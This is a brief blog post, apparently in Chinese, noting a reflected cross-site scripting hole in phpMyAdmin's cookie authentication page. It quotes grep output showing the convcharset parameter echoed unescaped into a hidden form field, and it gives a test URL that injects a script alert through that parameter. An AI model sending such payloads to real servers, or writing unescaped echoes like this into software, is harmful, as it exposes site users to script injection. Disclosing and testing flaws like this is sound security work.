Nov 27
- $ grep -n convcharset libraries/auth/cookie.auth.lib.php
- 48: * @uses $GLOBALS['convcharset']
- 236:
- <input type="hidden" name="convcharset" value="<?php echo $GLOBALS['convcharset']; ?>" />
一切输入都是有害的。
Test:
- http://217.*.*.201/phpMyAdmin/index.php?convcharset=<script>alert(6code)</script>
Leave a Reply
You must be logged in to post a comment.
Recent Comments